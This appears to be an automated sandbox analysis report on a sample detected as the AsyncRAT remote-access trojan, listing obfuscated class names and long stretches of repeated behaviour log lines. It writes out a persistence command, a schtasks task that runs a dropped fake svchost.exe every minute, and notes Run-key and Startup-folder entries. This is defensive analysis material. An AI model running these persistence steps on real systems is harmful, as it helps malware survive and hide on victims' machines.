Source: svchost.exe.0.dr, JaFabquuELSuh5D.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'jXg1ZrABHfC9wKJq5J9yq4PzeKc2fHEBvF3xzf3XLpcVX0EM63qZR4RDltfCyOEn9', 'f7FdaLZok1L2wzlzJ0NBM6ZptNK1Vy7kmhh2D0jE125yNdDY7bJOJ1WvxWrOM4IjG', 'ZdZ4TZHXmcPA0JlpxHJuZi9dKbjAPWaZvpCIEXNmF6QOTx7ewwApY5yzt7gZY0zKf', '_76aUG2KXWXlLFEQoKiJEidfhImp69uTu4rxYR7SrxYztzKMW2dLj1IjsN4w7JlUSmk7pSHY4bcyr8MeuBBtyCDkzB5x6QXTsb'
Source: svchost.exe.0.dr, CAKqia57kooc5P6Nhx6x0okYjQzUptMk.cs	High entropy of concatenated method names: 'xBASX7lsOJPU9Cck3kZ3o0qmLTAKuKrP', 'sGti6y5kLLjB4EZ2GKrqrV0zU', 'GsE9pLcip9MzANzPi5jppj9En', 'N6Q3SCv1YsLsr7H5DlyFIeDon', 'V6mV7RWu45SpqDfgnupk8TqiR'
Source: svchost.exe.0.dr, KTFdTAhBe0nkVRO.cs	High entropy of concatenated method names: 'Ac4uCzowotVAxeR', 'CBIihYpQadKB8KR', 'LzcKodkO0YBRvWP', 'OWqjciiKxuUIGMm', '_9xG6KQALPjaqxhT', 'veIBr5aKy0PJKi5', 'l6kAhdELfITzeJt', '_4ePiXFPx09SA1Vv', 'LVyky0svxDcPkam', 'XkNC0OhUGP0IEKK'
Source: svchost.exe.0.dr, xeujlJtakKMAZOjK0ur1WybEECxkXkut0zpG8ZNNqdLn0AX.cs	High entropy of concatenated method names: '_5aithjmI9LoLLPCiBILSlDH2d0kCQKXrMaEE5WJnq8Tv7Qp', 'MM7LW2HKoAitYgsdpjEATIqjAb0mwW0BBlvYMkhE7P10poq', 'QAbhGR8dNrSBTMQK0Yqav3jjG5ysRg32lWFoSxLIPma5gYP', '_0wUqk1OaVerqBQX3Y4EoWNEL1Gl2waveV0V6Gg77S9aATZP', 'Qdwp8hUnVeraABh1MLfyU5mz3arAdmAdd1aCcEk2Tl8TJDv', 'FZ2QI9XpgmmMWz11hK1DdH2zT62STcMbsDyZy4pm6rmtl3V', 'ACWqANoKGPn3bKLHCSH40rEahGuzJT1dxGB90nSsmjjylxv', 'pX8tVB0L5xZb2vb2dxPDe1rzEaM7wuaJwTZOCpk0aNdrtBw', 'fjhBRY1HMysdHfZcKmMXulYG8GDoyl12', 'McPQuVJNZQbtu65AyEQVTybL4WCB5cLo'
Source: svchost.exe.0.dr, 7G7PfuLETnOvbfIE7xucZO8XNTqvLqOJlbqtNQJY3lKmGbm.cs	High entropy of concatenated method names: 'DFCpCujzH36d3cngc34zOQoWzQTdK0myzc7qWpsXWNu21Jb', '_587FBEMOsxviTwCKL7yBbWITHUJ3bujt3wiySDVhRy1yxGt', 'uJohSukkbCa7xsGg2Qp44GPZQCpKe32xc2O2QcGU1Q6CEvS', 'Uq58pQq8xlhaYn5Y9Bk3mrYZu', 'Ct5qYzPDfKw8LQTboboAX4hNv', 'qwBAPgrRPhdIqDHwAhXvN1hRq', 'nxduhCDsny5h3nBj2HrQsA3c1', 'jEaCh8yFqsVsZ93zdOX0nzFV8', 'ONz3wVxNhiXm2TtIiy580HIt8', 'VZ6rHUWHhThtCv7iyZtPjrFZg'
Source: svchost.exe.0.dr, a0V5Zu6qlCMa06Q58DDhmURzmiMHtcd8kRscBWhcnJuQRjG.cs	High entropy of concatenated method names: 'jsYQiieE5aJ2jVwkXoxTSDWNphs6FAdVea24JiK6uxKGCZb', 'jvKVB8DMwRz9tgL1u0gNFSayI', 'FiiYcV3QUeyJyPiuXtFFLojQQ', '_4QTl9xaX3tWNxWuQRadqrMU6o', '_75GUCFNKwqLz6HmYfEL0DmkY1'
Source: svchost.exe.0.dr, Qt9FqRhwdaq8lsO4YuclZ2dhl0OfXlOd.cs	High entropy of concatenated method names: 'FMEE0DIkQDvLYM2Z4yz5Tjo5b5eLEuEI', 'jObZkjuGMhwEiPBfwOmsbOrrZXZmrCeZ', 'bk6xBVPwDLAsH9U1hF1haOabJtpvpGFf', 'IshekKslk6IjxnwmSRXRoHe4GAZv2VRl', 'GIs7dhgV0OPXyxFk6TOoHoDWhv8zemsT', 'ze8Iw4Nb7Z7m1Yb66vRbWQWrAsUFPxzJ', 'UvurS3nxIHoiBM88BrHYzPx81ufHUZkd', 'swIqkQW0BTghnqNG2wFoKjkNf068bLuM', '_2414yadJg26i5vSrWjNNjeYpa4szCoAz', 'lW6mYbJTX1vQ7vHCEMrrPebmTotc5GJY'
Source: svchost.exe.0.dr, EzYl9iqHKPGiGyI.cs	High entropy of concatenated method names: 'aP04aVJcS3soVLg', 'jobvqCGSO8bCpy3', 'OByK2z0r02mouhE', '_4I2j7ymc4y48Bup', 'MpaJfH3REaG3a2T', 'PeHeSMfcm6QgPRH', '_06w8NyFQYcs5BnZ', 'LJVYU95Gv9cQfMq', 'jDk0XayV147rHNd', 'csYJbTrZgHGnH53'
Source: svchost.exe.0.dr, eBrpb4hCA0IB3IXbiLbLrwFnr8OPmxVLdOHrECZWcn7Ppah.cs	High entropy of concatenated method names: 'MNtS90o1HKWpwjmtlvO903GbNTByocWwLd7yyIZn6Q4ZtXK', 'tzIwe855hkZVfy7N3N16Mzc4y7JQSTMeDbxwLesPqgFr2De', 'k2x8Jncr7poTh7SyXKLhwBvqXviBc7HReEzrmXDNeueIj4R', 'wgDXMbPi6ZUBuZgeleKoQmPFcJwxyeFiCLlifHYgdhR0kc7', 'p38ACEv6I0M4R7dcFane6uBzs7RWaUJ9l5lCftfrOLZHjWg', 'lHKkwUzolK1oj4q73uwvSeNCO9BIzUcyRC2wJ4WagDWhbfa', '_5AFeAlHwXQJYUYqjS4jFcrE5EzKlM0aFnRQpSNnCeTUN6eE', '_82o2RiaQ2aGLU4TurZxmJUMkxwaoX6pdrgWihYO1RGfhj50', 'jDnkgKOMiZiOTgqeOCX5BUDS3xxH5oN9D1nr4XpUx1AU8Rf', 'qJsGITEdu1leqjdiZJFhkC1OAKNXz9CA0lm9WH1MwNzOsHq'
Source: svchost.exe.0.dr, lwW1zcF0pcqJbKLsstMtGHZdM9caYfdk.cs	High entropy of concatenated method names: 'l7fCYY3hc0ERgtj8l2K7qTWgPUDKEQSU', 'bS9VEFiDBIgkPYTtej3kDHMXOhc0vH1s', '_3rpjR4YrSy5LkzuZ6z3xtf0c6UG2bZn9', 'zCgKRcmv0rfANyVcOzIiznvJFtvCa578', 'YSoW1FxgADijTplK7zUzpfaDA', '_2Ps92OUWolTdyV0IUdBqYGalt', 'plj2ugHMesPs6bv2tYUVwp2QD', '_2sjEZEKIzfsvSQGXaY0jAyQhN', 'ewIb0YUwF52UsD1qEVkA5tgsF', 'oGza4w5ImtYazv7CV4rdJUC9v'

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

File created: C:\ProgramData\svchost.exe

Jump to dropped file

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

File created: C:\ProgramData\svchost.exe

Jump to dropped file

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

File created: C:\ProgramData\svchost.exe

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: a9YMw44iQq.exe PID: 6216, type: MEMORYSTR

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Jump to behavior

Source: C:\Users\user\Desktop\a9YMw44iQq.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Jump to behavior

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\a9YMw44iQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
